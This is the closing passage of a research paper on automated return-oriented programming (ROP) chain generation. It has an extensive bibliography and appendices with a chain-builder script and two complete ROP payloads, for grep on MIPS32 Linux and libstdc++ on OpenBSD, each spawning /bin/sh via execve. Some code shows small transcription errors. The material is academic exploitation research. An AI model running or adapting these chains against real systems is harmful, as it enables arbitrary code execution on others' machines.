- [4] P. Godefroid, M. Y. Levin, and D. A. Molnar, "Automated whitebox fuzz testing," in *NDSS*, vol. 8, 2008, pp. 151–166. [Online]. Available: https://www.microsoft.com/en-us/research/publication/automated-whitebox-fuzz-testing/.
- [5] F. Saudel and J. Salwan, "Triton: A dynamic symbolic execution framework," in *Symposium sur la sécurité des technologies de l'information et des communications*, ser. SSTIC, 2015, pp. 31–54. [Online]. Available: https://triton.quarkslab.com/files/sstic2015\_slide\_en\_saudel\_salwan.pdf.
- [6] A. Vishnyakov, A. Fedotov, D. Kuts, A. Novikov, D. Parygina, E. Kobrin, V. Logunova, P. Belecky, and S. Kurmangaleev, "Sydr: Cutting edge dynamic symbolic execution," in 2020 Ivannikov ISPRAS Open Conference (ISPRAS), IEEE, 2020, pp. 46–54. DOI: 10.1109/ISPRAS51486.2020.00014.
- [7] H. Shacham, "The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86)," in *Proceedings of the 14th ACM Conference on Computer and Communications Security*, ser. CCS '07, ACM, 2007, pp. 552–561. DOI: 10.1145/1315245.1315313.
- [8] T. Bletsch, X. Jiang, V. W. Freeh, and Z. Liang, "Jump-oriented programming: A new class of codereuse attack," in *Proceedings of the 6th ACM Sympo*sium on Information, Computer and Communications

- Security, ser. ASIACCS '11, ACM, 2011, pp. 30–40. DOI: 10.1145/1966913.1966919.
- [9] E. J. Schwartz, T. Avgerinos, and D. Brumley, "Q: Exploit hardening made easy," in *Proceedings of the 20th USENIX Conference on Security*, ser. SEC'11, USENIX Association, 2011. [Online]. Available: https://www.usenix.org/legacy/event/sec11/tech/full\_papers/Schwartz.pdf.
- [10] R. Roemer, E. Buchanan, H. Shacham, and S. Savage, "Return-oriented programming: Systems, languages, and applications," *ACM Transactions on Information and System Security*, vol. 15, no. 1, 2:1–2:34, 2012. DOI: 10.1145/2133375.2133377.
- [11] Z.-S. Huang and I. G. Harris, "Return-oriented vulnerabilities in ARM executables," in 2012 IEEE Conference on Technologies for Homeland Security (HST), 2012, pp. 1–6. DOI: 10.1109/THS.2012.6459817.
- [12] O. L. Fraser, N. Zincir-Heywood, M. Heywood, and J. T. Jacobs, "Return-oriented programme evolution with ROPER: A proof of concept," in *Proceedings of* the Genetic and Evolutionary Computation Conference Companion, ser. GECCO '17, ACM, 2017, pp. 1447– 1454. DOI: 10.1145/3067695.3082508.
- [13] E. Buchanan, R. Roemer, H. Shacham, and S. Savage, "When good instructions go bad: Generalizing return-oriented programming to RISC," in *Proceedings of the 15th ACM Conference on Computer and Communications Security*, ser. CCS '08, ACM, 2008, pp. 27–38. DOI: 10.1145/1455770.1455776.
- [14] P. Chen, X. Xing, B. Mao, L. Xie, X. Shen, and X. Yin, "Automatic construction of jump-oriented programming shellcode (on the x86)," in *Proceedings of the 6th ACM Symposium on Information, Computer and Communications Security*, ser. ASIACCS '11, ACM, 2011, pp. 20–29. DOI: 10.1145/1966913.1966918.
- [15] R. Hund, T. Holz, and F. C. Freiling, "Return-oriented rootkits: Bypassing kernel code integrity protection mechanisms," in *Proceedings of the 18th Conference on USENIX Security Symposium*, ser. SSYM'09, USENIX Association, 2009, pp. 383–398. [Online]. Available: https://www.usenix.org/legacy/events/sec09/tech/full\_papers/hund.pdf.
- [16] N. A. Quynh, *OptiROP: Hunting for ROP gadgets in style*, 2013. [Online]. Available: https://media.blackhat.com/us-13/US-13-Quynh-OptiROP-Hunting-for-ROP-Gadgets-in-Style-Slides.pdf.
- [17] W. Ding, X. Xing, P. Chen, Z. Xin, and B. Mao, "Automatic construction of printable return-oriented programming payload," in 2014 9th International Conference on Malicious and Unwanted Software: The Americas (MALWARE), 2014, pp. 18–25. DOI: 10.1109/MALWARE.2014.6999408.
- [18] Y. Ouyang, Q. Wang, J. Peng, and J. Zeng, "An advanced automatic construction method of ROP," *Wuhan University Journal of Natural Sciences*, vol. 20, no. 2, pp. 119–128, 2015. DOI: 10.1007/s11859-015-1069-x.

- [19] A. Follner, A. Bartel, H. Peng, Y.-C. Chang, K. Ispoglou, M. Payer, and E. Bodden, "PSHAPE: Automatically combining gadgets for arbitrary method execution," in *Security and Trust Management*, Springer International Publishing, 2016, pp. 212–228. DOI: 10.1007/978-3-319-46598-2\_15.
- [20] B. Milanov, ROPGenerator: Practical automated ROPchain generation, 2018. [Online]. Available: https:// youtu.be/rz7Z9fBLVs0.
- [21] N. Mosier and P. Johnson, ROP with a 2nd stack, 2019. [Online]. Available: http://www.cs.middlebury. edu/~nmosier/portfolio/rsrc/ropc-slides.pdf.
- [22] A. V. Vishnyakov and A. R. Nurmukhametov, "Survey of methods for automated code-reuse exploit generation," *Programming and Computer Software*, vol. 47, pp. 271–297, 2021. DOI: 10.1134/S0361768821040071.
- [23] O. L. Fraser, ROPER: A genetic ROP-chain development tool. [Online]. Available: https://github.com/ oblivia-simplex/roper.
- [24] *mona.py*, Corelan Consulting BVBA. [Online]. Available: https://github.com/corelan/mona.
- [25] J. Salwan, *ROPgadget tool*. [Online]. Available: https://github.com/JonathanSalwan/ROPgadget.
- [26] B. Milanov, *ROPium*. [Online]. Available: https://github.com/Boyan-MILANOV/ropium.
- [27] C. Salls, *angrop*. [Online]. Available: https://github.com/salls/angrop.
- [28] S. Schirra, *Ropper*. [Online]. Available: https://github.com/sashs/ropper.
- [29] d4em0n, Exrop. [Online]. Available: https://github.com/ d4em0n/exrop.
- [30] T. F. Dullien, "Weird machines, exploitability, and provable unexploitability," *IEEE Transactions on Emerging Topics in Computing*, 2018. DOI: 10.1109/TETC.2017.2785299.
- [31] A. R. Nurmukhametov, E. A. Zhabotinskiy, S. F. Kurmangaleev, S. S. Gaissaryan, and A. V. Vishnyakov, "Fine-grained address space layout randomization on program load," *Programming and Computer Software*, vol. 44, no. 5, pp. 363–370, 2018. DOI: 10.1134/S0361768818050080.
- [32] A. Bittau, A. Belay, A. Mashtizadeh, D. Mazières, and D. Boneh, "Hacking blind," in *Proceedings of the 2014 IEEE Symposium on Security and Privacy*, ser. SP '14, IEEE Computer Society, 2014, pp. 227–242. DOI: 10.1109/SP.2014.22.
- [33] H. Hu, Z. L. Chua, S. Adrian, P. Saxena, and Z. Liang, "Automatic generation of data-oriented exploits," in *Proceedings of the 24th USENIX Conference on Security Symposium*, ser. SEC'15, USENIX Association, 2015, pp. 177–192. [Online]. Available: https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-hu.pdf.
- [34] T. Mortimer, "Removing ROP gadgets from OpenBSD," *AsiaBSDCon 2019*, pp. 13–21, 2019. [Online]. Avail-

- able: https://2019.asiabsdcon.org/proc-body-2019.pdf# page=13.
- [35] T. Kornau, "Return oriented programming for the ARM architecture," M.S. thesis, Ruhr-University, Bochum, Germany, 2009. [Online]. Available: https://bxi.es/Reversing-Exploiting/ROP/Return%20Oriented%20Programming%20for%20ARM.pdf.
- [36] T. Dullien, T. Kornau, and R.-P. Weinmann, *A framework for automated architecture-independent gadget search*, 2010. [Online]. Available: https://www.usenix.org/legacy/events/woot10/tech/full\_papers/Dullien.pdf.
- [37] A. Sadeghi, S. Niksefat, and M. Rostamipour, "Pure-call oriented programming (PCOP): Chaining the gadgets using call instructions," *Journal of Computer Virology and Hacking Techniques*, vol. 14, no. 2, pp. 139–156, 2018. DOI: 10.1007/s11416-017-0299-1.
- [38] M. Tran, M. Etheridge, T. Bletsch, X. Jiang, V. Freeh, and P. Ning, "On the expressiveness of return-into-libc attacks," in *Recent Advances in Intrusion Detection*, Springer Berlin Heidelberg, 2011, pp. 121–141. DOI: 10.1007/978-3-642-23644-0\_7.
- [39] A. Homescu, M. Stewart, P. Larsen, S. Brunthaler, and M. Franz, "Microgadgets: Size does matter in turing-complete return-oriented programming," in *In Proceedings of the 6th USENIX Workshop on Offensive Technologies, WOOT '12. USENIX Association*, 2012. [Online]. Available: https://www.usenix.org/system/files/conference/woot12/woot12-final9.pdf.
- [40] S. K. Cha, T. Avgerinos, A. Rebert, and D. Brumley, "Unleashing Mayhem on binary code," in *Proceedings* of the 2012 IEEE Symposium on Security and Privacy, ser. SP '12, IEEE Computer Society, 2012, pp. 380– 394. DOI: 10.1109/SP.2012.31.
- [41] A. N. Fedotov, V. A. Padaryan, V. V. Kaushan, S. F. Kurmangaleev, A. V. Vishnyakov, and A. R. Nurmukhametov, "Software defect severity estimation in presence of modern defense mechanisms," *Proceedings of the Institute for System Programming of the RAS*, vol. 28, no. 5, pp. 73–92, 2016. DOI: 10.15514/ISPRAS-2016-28(5)-4.
- [42] A. V. Vishnyakov, A. R. Nurmukhametov, S. F. Kurmangaleev, and S. S. Gaisaryan, "A method for analyzing code-reuse attacks," *Programming and Computer Software*, vol. 45, pp. 473–484, 2019. DOI: 10.1134/S0361768819080061.
- [43] A. Nurmukhametov and A. Vishnyakov, *ROP Benchmark*. [Online]. Available: https://github.com/ispras/rop-benchmark.
- [44] V. A. Padaryan, M. A. Soloviev, and A. I. Kononov, "Modeling operational semantics of machine instructions," *Proceedings of the Institute for System Program*ming of the RAS, vol. 19, pp. 165–186, 2010. [Online]. Available: https://www.ispras.ru/en/proceedings/ isp\_19\_2010/isp\_19\_2010\_165/.
- [45] ——, "Simulation of operational semantics of machine instructions," *Programming and computer software*, vol. 37, no. 3, pp. 161–170, 2011.

- [46] M. A. Soloviev, M. G. Bakulin, M. S. Gorbachev, D. V. Manushin, V. A. Padaryan, and S. S. Panasenko, "Next-generation intermediate representations for binary code analysis," *Programming and Computer Software*, vol. 45, pp. 424–437, 7 2019. DOI: 10.1134/S0361768819070107.
- [47] A. Follner, A. Bartel, and E. Bodden, "Analyzing the gadgets towards a metric to measure gadget quality," in *Engineering Secure Software and Systems*, Springer International Publishing, 2016, pp. 155–172. [Online]. Available: http://arxiv.org/abs/1605.08159.
- [48] P. Van Eeckhoutte, Exploit writing tutorial part 10: Chaining DEP with ROP the Rubik's[TM] cube, 2010. [Online]. Available: https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/.
- [49] D. E. Knuth, "Dancing links," *Millenial Perspectives in Computer Science*, pp. 187–214, 2000. [Online]. Available: https://arxiv.org/pdf/cs/0011047.pdf.

### APPENDIX A MAJORCA SCRIPT

#### Zsnes demo

```
#!/usr/bin/env python3
"""Generate ROP chain performing system call for zsnes.
import sys
from majorca import ChainBuilder
binary = "zsnes"
# Create chain builder from input binary
# with restricted symbols 0, /, \
b = ChainBuilder(binary=binary, bad_chars=b"\x00/\\")
# Generate chain to invoke system call 'execve'
# (x86 Linux) running /bin/sh
g = b.syscall("execve", "/bin/sh", 0, 0)
# Build chain
chain = b.build(q)
# Check if ROP chain is generated
if chain is None:
    sys.exit(100)
# Save script that generates ROP chain in file
script = "{}.majorca.script".format(binary)
with open (script, "w") as f:
    print(chain, file=f)
```

## APPENDIX B CHAIN EXAMPLES

#### grep Malta Linux MIPS32

```
from struct import pack
fill = b'A'  # fill character
chain = b''
# LW $ra, 24h($sp); LW $s1, 20h($sp);
# LW $s0, 1Ch($sp); JR $ra; ADDIU $sp, $sp, 28h
chain += pack('>I', 0x12410)
chain += 28 * fill
chain += pack('>I', 0x414f0)
chain += b'/bin'
# LW $ra, 24h($sp); SW $s1, ($s0); LW $s1, 20h($sp);
# LW $s0, 1Ch($sp); JR $ra; ADDIU $sp, $sp, 28h
chain += pack('>I', 0x21b80)
```

```
# LW $ra, 24h($sp); LW $s1, 20h($sp);
# LW $s0, 1Ch($sp); JR $ra; ADDIU $sp, $sp, 28h
chain += pack('>I', 0x12410)
chain += 28 * fill
chain += pack('>I', 0x414f4)
chain += b'/sh \times 00'
# LW $ra, 24h($sp); SW $s1, ($s0); LW $s1, 20h($sp); 
# LW $s0, 1Ch($sp); JR $ra; ADDIU $sp, $sp, 28h
chain += pack('>I', 0x21b80)
chain += 36 * fill
# LW $ra, 1Ch($sp); LW $s0, 18h($sp);
# JR $ra; ADDIU $sp, $sp, 20h
chain += pack('>I', 0x4980)
chain += 24 * fill
chain += pack('>I', 0x414f0)
# MOVE $a0, $s0; SLTIU $v0, $v0, 1h;
# LW $ra, 1Ch($sp); LW $s0, 18h($sp);
# JR $ra; ADDIU $sp, $sp, 20h
chain += pack('>I', 0x1f518)
chain += 28 * fill
# MOVE $a1, $zero; LW $ra, 24h($sp); MOVE $v0, $a1;
# LW $s2, 20h($sp); LW $s1, 1Ch($sp);
# LW $s0, 18h($sp); JR $ra; ADDIU $sp, $sp, 28h
chain += pack('>I', 0x1e0cc)
chain += 36 * fill
# MOVE $a2, $zero; LW $ra, 1Ch($sp); MOVE $v0, $v1;
# JR $ra; ADDIU $sp, $sp, 20h
chain += pack(' > I', 0x25538)
chain += 28 * fill
# LW $ra, 34h($sp); LW $v0, 1Ch($sp);
# LW $s3, 30h($sp); LW $s2, 2Ch($sp);
# LW $s1, 28h($sp); LW $s0, 24h($sp);
# JR $ra; ADDIU $sp, $sp, 38h
chain += pack('>I', 0x1c170)
chain += 28 * fill
chain += pack('>I', 0xfab)
chain += 20 * fill
# SYSCALL # execve('/bin/sh', 0, 0)
chain += pack('>I', 0x25c)
import os, sys
fp = os.fdopen(sys.stdout.fileno(), 'wb')
fp.write(chain)
```

#### libstdc++.so.57.0.bin OpenBSD 6.2 x86 64-bit

```
from struct import pack
fill = b'A'
            # fill character
chain = b''
# POP RAX; POP RBX; POP R12; RET
chain += pack('<Q', 0x431fb1)
chain += b'/bin/sh\x00'
chain += pack('<Q', 0xb79070)
chain += 8 * fill
# MOV QWORD PTR [RBX], RAX;
# ADD RSP, 10h; POP RBX; RET
chain += pack('<Q', 0x40a647)
chain += 24 * fill
# POP RAX; RET # MOV EDI, B79070h; JMP RAX
chain += pack('<Q', 0x40dee1)
# POP RDX; RET # XOR ESI, ESI; JMP RDX
chain += pack('<Q', 0x5d7d0b)
# JOP # MOV EDI, 00B79070h; JMP RAX
chain += pack('<Q', 0x4006ec)
# XOR EDX, EDX; ADD RSP, 10h;
# MOV EAX, EDX; POP RBX; RET
chain += pack(' < Q', 0x47843f)
# JOP # XOR ESI, ESI; JMP RDX
chain += pack('<Q', 0x41f378)
chain += 24 * fill
# POP RAX; RET
chain += pack('<Q', 0x40dee1)
chain += b'; \x00\x00\x00\x00\x00\x00'
# SYSCALL # execve(b'/bin/sh\x00', 0, 0)
chain += pack('<Q', 0x421a8c)
import os, sys
fp = os.fdopen(sys.stdout.fileno(), 'wb')
fp.write(chain)
```